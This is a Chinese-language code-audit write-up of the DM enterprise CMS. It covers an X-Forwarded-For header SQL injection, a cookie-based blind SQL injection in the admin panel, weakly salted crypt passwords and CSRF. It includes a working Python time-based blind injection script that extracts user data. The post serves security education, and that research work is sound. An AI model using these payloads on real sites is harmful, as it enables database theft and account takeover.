0x00 前言
这套源码已经经历多个版本的变迁,在安全性上也做了很大的改善,此番再次审计最新版本的DM建站系统,倒不是说非要找出个高危漏洞,更重要的是对自己这么长时间学习的一次检验与总结。

0x01 cms简介
这里审计的DM企业建站系统最新版本(v20180307),下载地址:http://down.chinaz.com/soft/37361.htm
DM企业建站系统是由php+mysql开发的一套专门用于中小企业网站建设的开源cms。
可以用来快速建设一个响应式的企业网站( PC,手机,微信都可以访问)。后台操作简单,维护方便。
系统主要特点:
1、模板管理功能,下载后,会有多个模板可选择。
2、可以给每个页面设置SEO关键字,有利于搜索引擎收录。可以给每个页面设置别名,从而是让网页的访问网址更加简洁。
3、后台有布局功能。让页面呈现更加方便。
4、丰富的区块效果
5、通过前台编辑,直接链接到后台。

0x02 cms功能点搜集
下面部分是本文的重点,因此我也会详细解释我是如何进行漏洞挖掘以及代码审计的,其实在安全这块,一个漏洞修补起来或者说识别出来可能非常容易,但是在这之前的挖掘上,很少有人会仔细写这块,看似水到渠成,但是这里的挖掘思路在笔者看来是极其关键的。
安装cms的过程就不说了,这里对照下载地址给的安装步骤一步步来即可。

对于代码审计这块,由于离不了cms所提供的功能,因此我在进行代码审计之前倾向于先搜集这个cms所提供的功能,例如用户注册、留言板、购物等等功能,然后根据相应的功能去进行源代码的审计,这样审计下来不会做太多重复的工作,效率上也能得到提升,慢慢地就形成了自己的审计路子。
安装完第一个可能想到的就是是否存在重装漏洞,那么我们需要看一看install这块是否会判断install文件的存在。

这里可以看到会判断installfile的存在,因此此处没有数据库重装这样的漏洞,继续审计~
之后可能就要搜集页面的功能点,这个应该也比较简单。
随便点击页面,发现页面是纯静态的(http://127.0.0.1/dm/contact.html)
那么可能对页面id这种常见的注入漏洞可以说是不存在的,前台搜集下来发现存在搜索以及留言板这样的功能,那么思路就应该是搜索处或者留言板是否存在sql注入或者xss漏洞。
前台就是这两个功能点,后台的话之前版本存在一个cookie注入,因此这里我们也可以把重点放在后台的认证上来,毕竟出现出过问题,另一个常见的可能就是后台的登录框注入、未授权访问等等。

整理一下,前台潜在的漏洞点就是搜索功能、留言板功能,后台潜在的漏洞点就是登录框注入、cookie的认证问题或是其他未授权访问、CSRF等常见的漏洞,下面我们根据整理出来的功能点进行一一测试。
0x03 cms代码审计
1.搜索功能

这里我搜索的是test”<>,老司机应该都能看出来,这其实就是一个最简单的fuzz语句,来初步看看后台的处理功能

这里可以看到都做了实体化,因此这里可以判断后台应该使用htmlspecialchars或者htmlentities这样的函数来写的,事实上也是如此。
下面进入代码审计时间,在审计之前稍微说下该cms的路由是怎么写的,也就是说是怎么找到最终的函数文件的,后面不再赘述~

这是搜索处的文件search.php,这里很重要的就是$file=’search’,然后包含了indexDM_load.php这个文件,然后我们跟进包含的文件

这里首先会对file做一次htmlentitdm,这个函数是cms自己定义的

看完这个函数,就可以知道前面说的搜索那里不是采用了htmlspecialchars,就是采用了htmlentities函数,这里加上了ENT_QUOTES的属性,也就是对单引号和双引号也进行实体化操作,在先前的版本就是由于没有加上这个属性,导致了诸多注入问题的产生,在该版本这个问题得到了很大的改善!
下面我们回到刚才的路由问题

在indexDM_load.php文件末尾又包含了三个文件,这里当然需要一一去看,同时不要忘了我们传入的参数应该是$file=’search’,重点找找file这个参数最终会引入哪个文件。
根据经验来看,inc基本都是配置文件,因此这里我先看末尾的这个file_inc.php,事实上就写在这个文件里

这里根据代码流程跟着走就是了,file参数不为空,没有ifalias参数,因此最终我们进入到了最下面的判断语句,最终包含的文件也就是file_search.php,整个cms的路由就讲到这里。
这里多说一句,那就是这里的路由寻找是整个cms代码审计的基底,没有这个基底,我们就不可能找到最终的函数文件,或者说先进行路由的寻找,对后面的审计效率都有大大的帮助。

这里可以看到采用了htmlentitdm自己定义的函数,将单引号、双引号、<>等字符都进行了实体化,因此这里搜索功能可以判定不存在漏洞。
2.留言板功能

这里存在留言板功能,说实话,我几乎可以判定这些参数都应该经过了htmlentitdm这个函数的过滤,这就导致了不存在xss、不存在sql注入这类常见的漏洞,但是我想测试的是这里是否会出现调用ip这样的函数,往往这里的函数会缺乏安全性上的考虑,从而出现安全问题。
这里由于采用的静态页面,因此为了寻找真正的提交函数,我才用了burp抓包来辅助寻找。

其实就是想知道到底处理留言板函数的到底是哪个文件,这里其实就是dmpostform.php,然后我们跟进这个文件,对照相应的参数来看看代码是怎么实现的。

这里依旧没有留言板的功能函数,我们按照上面的路由方法去到include目录下进行搜寻,这里file参数加了个前缀formpost_,然后type参数为formblock,那么最终的file参数即为foremost_formblock。

处理留言板的最终文件即为file_foremost_formblock.php文件,这里可能是运气好,出现了之前想要测试的点,那就是getip这个函数,如果这个函数没有经过任何过滤,那么有可能出现xff注入漏洞。在上图中有两个sql语句,里面都出现了ip这样的参数。

这里可以看到getip这个函数,没有任何的过滤,直接可以从X-Forwarded-For里面获取,因此这里我们可以判断存在http头注入漏洞
Poc:

这里我没有加上sleep语句,回应时间是1s

这里加上了sleep语句,并进行了闭合,最终延时为9s
3.后台登录功能
鉴于这里之前出过cookie上的认证问题,这里重点就是cookie的认证方式是否存在漏洞,这里首先还是来看看前台登录框的代码是怎么写的。

这里还是采用了自定义的htmlentitdm函数,对单引号、双引号进行了转义,并且在sql语句中也不是直接进行拼接,需要对单引号进行闭合,因此这里不存在登录框注入这样的安全问题。
下面来看看后台是怎么对cookie进行校验的,这里笔者做的就是看看后台文件是否都包含了一些基础配置文件,然后再从这些配置文件中去查找cookie的相关操作函数,这里后台的基础配置文件为common.inc2010.php

果然这里还是出问题了,这里的usercookie是从cookie参数中取得,也就是这是我们可以控制的参数,其次使用explode函数来进行分割,前半部分赋给参数userid,在之后的sql语句中就对userid进行了查询,这里没有任何的过滤,因此也就出现了cookie注入漏洞。
Poc:

#-*-coding:utf-8-*-
import requests
import time
import string
url="http://127.0.0.1//dm/admindm-adog/mod_common/mod_index.php?lang=cn"
payload=string.lowercase
ans=''
for j in range(1,6):
    for i in payload:
        poc="77' and if(substr((select email from zzz_user limit 0,1),%d,1)='%s',sleep(3),sleep(0)) #-123456" % (j,i)
        #print poc
        cookies=dict(usercookie=poc)
        start_time=time.time()
        s=requests.get(url=url,cookies=cookies)
        end_time=time.time()

        if end_time - start_time >2:
            ans+=i
            print ans
            break
        else:
            continue

这里只获取了用户名,当然获取管理员密码也是可以的,但是这里管理员密码不是常见的MD5,还是来分析下管理员密码到底是怎么生成的!

这里我寻找生成算法的方法是,到添加管理员的地方,然后根据密码那个参数来进行分析,到底经过了哪些参数,又加了哪些盐(salt)。

在修改管理员那里看到了生成算法,采用了php内置的crypt函数,其中salt为预定义变量,这里为00,经过百度后发现这个加密函数返回使用 DES、Blowfish 或 MD5 算法加密的字符串,在主流的MD5网站上是可以破解的,这里我们可以尝试一下。

使用crypt函数来尝试加密字符串‘123456’,salt为00,最终结果为0044EOfKxmlX2
这里看到这个字符串也是可以解密,因此针对DM建站系统所生成的密码,我们也是可以进行破解的。

4.Csrf
这里发现在修改管理员密码或者添加管理员账号时没有token的限制或者referer的认证,因此存在csrf漏洞。

0x04 总结
后面在getshell这块也做了很多尝试,像最简单的文件上传,但是这里采用的是白名单机制,因此不存在任意文件上传,同时找了下shell写入,我在全局进行了file_put_contents函数的搜索,对每一个文件都进行了跟进,仿佛都不能写入shell,最后我发现include目录下存放着一个php文件,文件里执行了将管理员密码重置为admin123的sql语句,但是文件头部设置了函数,不能直接进行访问,想要通过修改file变量来达到调用该文件的目的也无果。
总体来说这套源码在安全性上已经有了很大的改进,加之功能点不足,本身可测试的地方就不是很多,只能就着现有的功能函数去进行代码审计,也发现了一定的问题,写下此篇主要是为那些代码审计有一定基础,但是思路仍不够开阔的人所用,希望能有所帮助~

上述如有不当之处,敬请指出~也欢迎各位师傅一起交流!

点击收藏 | 1 关注 | 1
登录 后跟帖